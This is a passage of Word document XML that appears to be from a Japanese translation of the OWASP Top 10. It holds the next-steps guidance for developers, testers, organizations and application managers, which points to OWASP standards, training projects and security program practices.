          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId267">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CWE-778: Insufficient Logging</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="268"/>
    <w:bookmarkEnd w:id="269"/>
    <w:bookmarkEnd w:id="270"/>
    <w:bookmarkStart w:id="282" w:name="d-開発者のための次のステップ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+D 開発者のための次のステップ</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="281" w:name="反復可能なセキュリティプロセスと標準セキュリティ制御の確立と使用"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>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活動</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">説明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">アプリケーションセキュリティ要件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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39">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP Application Security Verification Standard (ASVS)</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">を活用することを推奨します。もし開発を外部に委託するのであれば、</w:t>
            </w:r>
            <w:hyperlink r:id="rId271">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP Secure Software Contract Annex</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">を参照して下さい。**注意**: このドキュメントは米国の契約法に基づきます。そのため、当該ドキュメントのサンプルを活用する前に、弁護士に相談してください。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">アプリケーションセキュリティアーキテクチャ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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2">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP Prevention Cheat Sheets</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">を推奨します。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">標準的なセキュリティ制御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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2">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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">セキュアな開発ライフサイクル</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">セキュアなアプリケーションやAPIを開発する際に、組織が従うべきプロセスを改善するため、OWASPは</w:t>
            </w:r>
            <w:hyperlink r:id="rId50">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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">アプリケーションセキュリティ教育</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink r:id="rId272">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP Education Committee</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">では、Webアプリケーションセキュリティに関する開発者向けトレーニングに役立つ教育コンテンツを公開しています。脆弱性に関する実地訓練には、</w:t>
            </w:r>
            <w:hyperlink r:id="rId273">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP WebGoat</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:hyperlink r:id="rId274">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">WebGoat.NET</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:hyperlink r:id="rId275">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP NodeJS Goat</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:hyperlink r:id="rId276">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP Juice Shop Project</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">、そして</w:t>
            </w:r>
            <w:hyperlink r:id="rId277">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP Broken Web Applications Project</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">を試して下さい。最新情報の入手には、</w:t>
            </w:r>
            <w:hyperlink r:id="rId34">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP AppSec Conference</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:hyperlink r:id="rId34">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP Conference Training</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">、そして各地で開催される</w:t>
            </w:r>
            <w:hyperlink r:id="rId33">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8">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9">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">wiki</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">で閲覧ができます。そしてOWASPの多くの文書を</w:t>
      </w:r>
      <w:hyperlink r:id="rId280">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ハードコピーや電子書籍</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">で注文できます。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="281"/>
    <w:bookmarkEnd w:id="282"/>
    <w:bookmarkStart w:id="285" w:name="t-セキュリティテスト担当者のための次のステップ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+T: セキュリティテスト担当者のための次のステップ</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="284" w:name="継続的なアプリケーションセキュリティテストを確立する"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">継続的なアプリケーションセキュリティテストを確立する</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">セキュアにコードを実装することは重要です。しかし、構築しようとしているセキュリティがあり、それが正しく実装され、あらゆる箇所に適用されていることを確認することも重要です。アプリケーションセキュリティテストの目的は、セキュアな実装がなされていることの証跡を得ることです。アプリケーションセキュリティテストは難しく、複雑であり、アジャイルやDevOpsのような最新の高速な開発プロセスにおいては、従来のアプローチやツールでは立ち行かなくなっています。そのため、アプリケーションポートフォリオの全体において、重要と考えられることにどのように焦点をあて、費用対効果の高い手法をとるべきかを考慮することを強く推奨します。昨今、リスクは急速に変化を遂げており、毎年1回程度だけ脆弱性スキャンや侵入テストを行っていた時代は遠い昔のことです。また昨今のソフトウェア開発においては、ソフトウェア開発ライフサイクル全体での継続的なアプリケーションセキュリティテストが要求されています。開発スピードを損なうことのないようセキュリティの自動化を施し、既存の開発プロセスを強化してください。どのアプローチを選択したとしても、アプリケーションポートフォリオの規模に応じたテスト、トリアージ、修復、再テスト、再デプロイに係る年間コストを考慮してください。</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活動</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">説明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">脅威モデルの理解</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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39">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP ASVS</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">と</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId48">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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SDLC（ソフトウェア開発ライフサイクル）の理解</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">テスト戦略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">各要件を検証するための最も簡単で、高速、かつ、正確な方法を選択してください。</w:t>
            </w:r>
            <w:hyperlink r:id="rId283">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">OWASP Security Knowledge Framework</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">と</w:t>
            </w:r>
            <w:hyperlink r:id="rId39">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できます。自動化したツールを利用したことによるfalse-positiveに対処することに加え、重大なfalse-negativeに対処するための人的リソースの確保を考慮してください。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">範囲と正確さの達成</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">明確な結果の伝達</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>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bookmarkEnd w:id="284"/>
    <w:bookmarkEnd w:id="285"/>
    <w:bookmarkStart w:id="294" w:name="o-組織のための次のステップ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+O 組織のための次のステップ</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="293" w:name="今すぐアプリケーションセキュリティ計画を開始しましょう"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">今すぐ、アプリケーションセキュリティ計画を開始しましょう</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションセキュリティの実装は必須になっています。増加する攻撃と規制の圧力の間で、アプリケーションとAPIを保護するための効果的なプロセスや能力を組織において確立する必要があります。すでに開発した膨大な数のアプリケーションとAPIの長大な行数のコードがあり、多くの組織では膨大な量の脆弱性に対処することに奮闘しています。OWASPはアプリケーションとAPIにおけるセキュリティを改良するためにアプリケーションセキュリティのプログラムを組織において確立することを推奨しています。アプリケーションセキュリティを実現するには、セキュリティと監査、ソフトウェア開発、ビジネス及びエグゼクティブマネジメントを含む、組織のさまざまな部門が効率的に連携する必要があります。各部門において組織におけるアプリケーションセキュリティの実態を把握できるよう、セキュリティの見える化を図り、計測可能な状態にすべきです。リスクを排除または低減することにより企業のセキュリティを向上させるような活動や成果に集中しましょう。以下のリストに示す活動のほとんどは、</w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP SAMM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">と</w:t>
      </w:r>
      <w:hyperlink r:id="rId286">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Application Security Guide for CISOs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">に掲載されています。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="287" w:name="はじめに"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">はじめに</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">全てのアプリケーションと関連するデータ資産を文書化します。より大きな組織においては、文書化を実現するために構成管理データベース（CMDB）を実装することを検討すべきです。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">アプリケーションセキュリティのプログラム</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を構築し、適用します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">自らの組織と同様の組織の間の</w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ギャップ分析</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を実施して、重要な要改善分野と実行プランを定義します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">経営層の許可を取り付け、</w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">アプリケーションセキュリティの意識向上活動</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を情報システム部門全体で実施します。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="287"/>
    <w:bookmarkStart w:id="288" w:name="リスクベースポートフォリオアプローチ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">リスクベースポートフォリオアプローチ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ビジネスの観点から</w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">アプリケーションポートフォリオの保護の必要性</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を特定します。これは、保護されるデータ資産に関連するプライバシー法やその他の規制によって一部は実現されます。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">組織のリスク耐性を踏まえた一貫性のあるリスク発生可能性と影響度の定義した共通の</w:t>
      </w:r>
      <w:hyperlink r:id="rId65">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">リスク評価モデル</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を確立します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">すべてのアプリケーションとAPIを測定し、優先順位付けを行います。結果をCMDBに追加します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">範囲と厳密さのレベルを適切に設定するために、品質保証ガイドラインを確立します。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="288"/>
    <w:bookmarkStart w:id="290" w:name="強力な基礎の作り上げ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">強力な基礎の作り上げ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">全ての開発チームが遵守すべきアプリケーションセキュリティのベースラインを定義した</w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">組織の方針と標準</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を確立します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">これらの方針と標準を補完する</w:t>
      </w:r>
      <w:hyperlink r:id="rId289">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">再利用可能なセキュリティ制御</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を定義し、それらを使用する際の設計開発ガイドラインを提供します。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">様々な開発の役割やトピックからなる</w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">アプリケーションセキュリティのトレーニングカリキュラム</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を確立します。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="290"/>
    <w:bookmarkStart w:id="291" w:name="セキュリティを既存プロセスに統合"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">セキュリティを既存プロセスに統合</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">セキュリティ実装</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">、修正作業を含みます。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">開発及びプロジェクトチームが成功するように専門家（SME）と</w:t>
      </w:r>
      <w:hyperlink r:id="rId50">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">サポートサービス</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">を提供します。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="291"/>
    <w:bookmarkStart w:id="292" w:name="管理可視化の提供"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">管理可視化の提供</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>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bookmarkEnd w:id="292"/>
    <w:bookmarkEnd w:id="293"/>
    <w:bookmarkEnd w:id="294"/>
    <w:bookmarkStart w:id="302" w:name="a-アプリケーションマネージャのための次のステップ"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+A: アプリケーションマネージャのための次のステップ</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="295" w:name="アプリケーションライフサイクル全体を管理する"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションライフサイクル全体を管理する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bookmarkEnd w:id="295"/>
    <w:bookmarkStart w:id="296" w:name="リソース管理の要件"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">リソース管理の要件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">全てのデータ資産における機密性、真正性、完全性及び可用性や予想されるビジネスロジックに関する保護要件を含む、アプリケーションに対するビジネス要件を収集し、交渉する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">機能及び非機能のセキュリティ要件を含む、技術的な要件を蓄積する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">セキュリティに関する活動を含む、設計、ビルド、テスト及び運用の全ての側面をカバー可能な予算を計画し、交渉する。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="296"/>
    <w:bookmarkStart w:id="297" w:name="提案依頼書-rfpと契約"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">提案依頼書 (RFP)と契約</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">例えば、ソフトウェア開発ライフサイクルにおけるベストプラクティスといったセキュリティプログラムに関するガイドラインやセキュリティ要件などについて、社内外の開発者と要件を交渉する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">計画と設計工程を含む、全ての技術要件の達成を評価する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">設計、セキュリティ、サービスレベルアグリーメント（SLA）を含む技術的な要件を交渉する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:hyperlink r:id="rId271">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP Secure Software Contract Annex</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">のような様式やチェックリストを適用する。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">注記</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: OWASP Secure Software Contract Annexは米国の契約法に基づいている。そのため、参照するに当たっては、弁護士に相談する。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="297"/>
    <w:bookmarkStart w:id="298" w:name="計画と設計"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">計画と設計</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">開発者や社内の株主や例えばセキュリティ専門家と計画や設計を交渉する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">保護の必要性と予想される脅威レベルに応じたセキュリティアーキテクチャ、制御及び対策を定義する。定義するに当たっては、セキュリティ専門家がサポートをするべきである。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">アプリケーションオーナーが残存するリスクを受容するか、追加のリソースを提供する。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
